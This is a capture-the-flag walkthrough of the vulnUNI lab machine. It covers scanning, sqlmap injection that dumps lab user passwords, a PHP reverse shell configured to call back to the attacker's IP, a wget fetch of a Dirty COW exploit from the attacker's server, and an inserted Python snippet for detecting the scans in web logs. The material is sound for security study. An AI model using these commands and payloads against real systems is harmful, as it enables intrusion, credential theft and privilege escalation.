HackingLab – vulnUNI

We start by scanning the network with netdiscover to identify the target machine; the target answers at IP 192.168.188.85.

Currently scanning: 172.16.80.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                           
 142 Captured ARP Req/Rep packets, from 11 hosts.   Total size: 8520                                                       
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.188.81  08:00:27:8d:88:12    101    6060  PCS Systemtechnik GmbH                                                  
 192.168.188.1   98:9b:cb:9f:3a:e3     20    1200  AVM Audiovisuelles Marketing und Computersysteme GmbH                   
 192.168.188.20  cc:b0:da:aa:38:07     11     660  Liteon Technology Corporation                                           
 192.168.188.43  54:b8:0a:01:ad:33      1      60  D-Link International                                                    
 192.168.188.65  08:00:27:4e:2c:1c      1      60  PCS Systemtechnik GmbH                                                  
 192.168.188.25  34:41:5d:e7:72:d7      1      60  Intel Corporate                                                         
 192.168.188.23  48:d6:d5:03:07:22      1      60  Google, Inc.                                                            
 192.168.188.85  08:00:27:78:1f:24      1      60  PCS Systemtechnik GmbH                                                  
 192.168.188.29  00:03:7f:c3:11:0c      1      60  Atheros Communications, Inc.                                            
 192.168.188.26  40:b0:34:db:2a:65      2     120  Hewlett Packard                                                         
 192.168.188.21  a8:db:03:6e:3f:f9      2     120  SAMSUNG ELECTRO-MECHANICS(THAILAND)

With nmap we scan the open ports and services; the syntax is sudo nmap -sV -sT -O -A -p- <IP ADDRESS> where:
-sV enables service/version detection on the open ports,
-sT selects a TCP connect scan,
-O enables Operating System detection,
-A enables an "aggressive" scan (OS detection, version detection, script scanning and traceroute),
-p- scans all 65535 ports.

The nmap scan reveals the following open port:
80 – http.

kali@kali:~/Documenti/VulnUNI$ sudo nmap -sV -sT -O -A -p- 192.168.188.85
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-08 17:07 CEST
Nmap scan report for vulnuni.local (192.168.188.85)
Host is up (0.00065s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni - We train the top Information Security Professionals
MAC Address: 08:00:27:78:1F:24 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.65 ms vulnuni.local (192.168.188.85)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.75 seconds

We proceed with the enumeration of the website listening on port 80 using gobuster, with the syntax gobuster dir -u <IP ADDRESS> -w <WORDLIST PATH>.

kali@kali:~/Documenti/VulnUNI$ gobuster dir -u 192.168.188.85 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.188.85
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/08 17:47:48 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/about (Status: 200)
/blog (Status: 200)
/cgi-bin/ (Status: 403)
/contact (Status: 200)
/courses (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/teacher (Status: 200)
===============================================================
2020/06/08 17:48:01 Finished
===============================================================

We open the /courses path and view the page source looking for interesting information: we find a reference to an unlinked page, vulnuni-eclass-platform.html.

<!-- Disabled till new version is installed -->
<!-- <li class="nav-item"><a href="vulnuni-eclass-platform.html" class="nav-link">EClass Platform</a></li> -->

We open it and are shown a login page.

We start Burp Suite to intercept the request, submitting an arbitrary Username and Password, and save the request so that we can reuse it later with sqlmap.
We therefore enable the proxy in the web browser, pointing it at 127.0.0.1 port 8080, launch Burp Suite, go to Proxy –> Intercept and turn on "Intercept is on".
We submit the form and click Forward to intercept the request, which we save to a txt file. We then disable the proxy so that normal browsing is not blocked.

Below is the login request as intercepted by Burp Suite.

POST /vulnuni-eclass/ HTTP/1.1
Host: vulnuni.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.85/vulnuni-eclass/
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Connection: close
Cookie: PHPSESSID=b53htpaatrv771a0j3n6gd5n11
Upgrade-Insecure-Requests: 1
uname=admin&pass=admin&submit=Enter

We use sqlmap to test the database for injection, passing --dbs to list the databases and --batch to skip the interactive prompts; we find the following databases:
eclass,
information_schema,
INFOSEC100,
mysql,
performance_schema.

kali@kali:~/Documenti/VulnUNI$ sqlmap -r request --dbs --batch
        ___
       __H__                                                                                                                
 ___ ___[(]_____ ___ ___  {1.4.6#stable}                                                                                    
|_ -| . [.]     | .'| . |                                                                                                   
|___|_  [.]_|_|_|__,|  _|                                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:20:15 /2020-06-08/

[18:20:15] [INFO] parsing HTTP request from 'request'
[18:20:15] [INFO] resuming back-end DBMS 'mysql' 
[18:20:15] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=jfh729pdtp8...hejngo3do5'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=admin' AND (SELECT 8714 FROM (SELECT(SLEEP(5)))zxwY) AND 'rvZs'='rvZs&pass=admin&submit=Enter
---
[18:20:16] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[18:20:16] [INFO] fetching database names
[18:20:16] [INFO] fetching number of databases
[18:20:16] [INFO] resumed: 5
[18:20:16] [INFO] resumed: information_schema
[18:20:16] [INFO] resumed: INFOSEC100
[18:20:16] [INFO] resumed: eclass
[18:20:16] [INFO] resumed: mysql
[18:20:16] [INFO] resumed: performance_schema
available databases [5]:
[*] eclass
[*] information_schema
[*] INFOSEC100
[*] mysql
[*] performance_schema
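From the defender's side, both the gobuster enumeration above and the sqlmap time-based blind injection (a login POST that answers in ~5 s because of SLEEP(5)) leave a clear footprint in the web server log. The following is an added example, not code from the original write-up: it assumes an Apache combined log format with the response time in microseconds (%D) appended as the last field, and runs over constructed sample lines.

```python
import re
from collections import Counter

# Constructed Apache access-log sample (not from the page): combined format with the
# response time in microseconds (%D) appended. Login POSTs from .87 take ~5 s because
# the injected query calls SLEEP(5); the gobuster lines pile up 403/404 responses.
SAMPLE_LOG = """\
192.168.188.87 - - [08/Jun/2020:17:47:48 +0200] "GET /.htaccess HTTP/1.1" 403 290 "-" "gobuster/3.0.1" 812
192.168.188.87 - - [08/Jun/2020:17:47:49 +0200] "GET /zzzz HTTP/1.1" 404 290 "-" "gobuster/3.0.1" 655
192.168.188.87 - - [08/Jun/2020:17:47:49 +0200] "GET /aaaa HTTP/1.1" 404 290 "-" "gobuster/3.0.1" 640
192.168.188.20 - - [08/Jun/2020:18:10:02 +0200] "GET /courses HTTP/1.1" 200 8120 "-" "Mozilla/5.0" 2210
192.168.188.87 - - [08/Jun/2020:18:20:16 +0200] "POST /vulnuni-eclass/ HTTP/1.1" 200 3310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 5004112
192.168.188.87 - - [08/Jun/2020:18:20:22 +0200] "POST /vulnuni-eclass/ HTTP/1.1" 200 3310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" 5003877
192.168.188.20 - - [08/Jun/2020:18:21:00 +0200] "POST /vulnuni-eclass/ HTTP/1.1" 302 0 "-" "Mozilla/5.0" 18340
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" (?P<usec>\d+)$'
)


def parse_log(text):
    """Parse lines into dicts with int status and float seconds; non-matching lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            e["seconds"] = int(e["usec"]) / 1_000_000
            entries.append(e)
    return entries


def slow_login_posts(entries, login_path="/vulnuni-eclass/", min_seconds=4.5):
    """Per client IP, count login POSTs that took at least min_seconds: a real login
    answers in milliseconds, repeated ~5 s answers are the SLEEP(5) footprint."""
    hits = Counter(e["ip"] for e in entries
                   if e["method"] == "POST" and e["path"] == login_path
                   and e["seconds"] >= min_seconds)
    return dict(hits)


def enumeration_sources(entries, min_errors=3):
    """IPs that announce a scanner in the User-Agent or rack up >= min_errors 403/404s."""
    errors = Counter(e["ip"] for e in entries if e["status"] in (403, 404))
    flagged = {e["ip"] for e in entries
               if any(t in e["ua"].lower() for t in ("gobuster", "sqlmap"))}
    flagged.update(ip for ip, n in errors.items() if n >= min_errors)
    return flagged
```

Note that the injection lines carry the browser User-Agent copied from the Burp request file, so the response-time signal, not the User-Agent, is what exposes them.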

We use sqlmap to extract users and passwords with the syntax sqlmap -r <REQUEST> -D <DB NAME> -T <TABLE> -C <COLUMNS> --dump --batch.

kali@kali:~/Documenti/VulnUNI$ sqlmap -r request -D eclass -T user -C username,password --dump --batch
        ___
       __H__                                                                                                                
 ___ ___[.]_____ ___ ___  {1.4.6#stable}                                                                                    
|_ -| . [(]     | .'| . |                                                                                                   
|___|_  [)]_|_|_|__,|  _|                                                                                                   
      |_|V...       |_|   http://sqlmap.org                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:50:14 /2020-06-08/

Database: eclass
Table: user
[4 entries]
+----------+--------------+
| username | password     |
+----------+--------------+
| admin    | ilikecats89  |
| garris.e | hf74nd9dmw   |
| perez.s  | i74nw02nm3   |
| smith.j  | smith.j.1971 |
+----------+--------------+

We log in with username admin and password ilikecats89.
Under Administration Tools we find the entry Restore a course, which allows the upload of a file in compressed format.

We prepare the php-reverse-shell.php script for upload by copying it from /usr/share/webshells/php and editing it with the details of our Kali machine.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.188.87';  // CHANGE THIS
$port = 4455;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

We set up a listener on port 4455 with nc, using the syntax nc -lvp 4455, and trigger the payload from the path vulnuni.local/vulnuni-eclass/courses/tmpUnzipping/<PAYLOAD NAME>. We upgrade to an interactive shell with the command python -c 'import pty; pty.spawn("/bin/bash")'.

kali@kali:~/Documenti/VulnUni$ nc -lvp 4455
listening on [any] 4455 ...
connect to [192.168.188.87] from vulnuni.local [192.168.188.73] 37962
Linux vulnuni 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:39:31 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
 11:44:18 up 27 min,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'                                                
www-data@vulnuni:/$ whoami
whoami
www-data
www-data@vulnuni:/$ id 
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@vulnuni:/$ 

In the /home/vulnuni directory we find the first flag:
68fc668278d9b0d6c3b9dc100bee181e

www-data@vulnuni:/home/vulnuni$ cat flag.txt
cat flag.txt
68fc668278d9b0d6c3b9dc100bee181e

We check the kernel version looking for a known vulnerability and find that kernel 3.11.0-15 is affected by the Dirty COW vulnerability. We download the exploit from Exploit Database and start an HTTP server with python.

kali@kali:~/Documenti/VulnUni$ ls -al
totale 28
drwxr-xr-x 2 kali kali 4096 giu 11 08:59 .
drwxr-xr-x 5 kali kali 4096 giu 11 08:21 ..
-rw-r--r-- 1 kali kali 5006 giu 11 08:58 40839.c
-rwxr-xr-x 1 kali kali 5496 giu 11 08:30 shell.php
-rw-r--r-- 1 kali kali 2429 giu 11 08:41 shell.zip
kali@kali:~/Documenti/VulnUni$ python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...

On the target machine we move to the /tmp directory, to be sure we have write permission, and download the exploit; we compile it with the syntax given in its source code, gcc -pthread dirty.c -o dirty -lcrypt, and run it.

www-data@vulnuni:/$ cd /tmp
cd /tmp
www-data@vulnuni:/tmp$ wget http://192.168.188.87:8000/40839.c
wget http://192.168.188.87:8000/40839.c
--2020-06-11 12:02:18--  http://192.168.188.87:8000/40839.c
Connecting to 192.168.188.87:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5006 (4.9K) [text/plain]
Saving to: `40839.c'

100%[======================================>] 5,006       --.-K/s   in 0s      

2020-06-11 12:02:18 (849 MB/s) - `40839.c' saved [5006/5006]

www-data@vulnuni:/tmp$ ls -al
ls -al
total 36
drwxrwxrwt  6 root     root     4096 Jun 11 12:02 .
drwxr-xr-x 24 root     root     4096 Mar 18 00:40 ..
drwxrwxrwt  2 root     root     4096 Jun 11 11:16 .ICE-unix
-r--r--r--  1 root     root       11 Jun 11 11:16 .X0-lock
drwxrwxrwt  2 root     root     4096 Jun 11 11:16 .X11-unix
-rw-rw-rw-  1 www-data www-data 5006 Jun 11 09:58 40839.c
drwxrwxrwt  2 lightdm  lightdm  4096 Jun 11 11:16 at-spi2
drwx------  2 lightdm  lightdm  4096 Jun 11 11:16 pulse-fw4HcDFew9fu
-rw-rw-r--  1 lightdm  lightdm     0 Jun 11 11:16 unity_support_test.1
www-data@vulnuni:/tmp$ gcc -pthread 40839.c -o dirtycow -lcrypt             
gcc -pthread 40839.c -o dirtycow -lcrypt
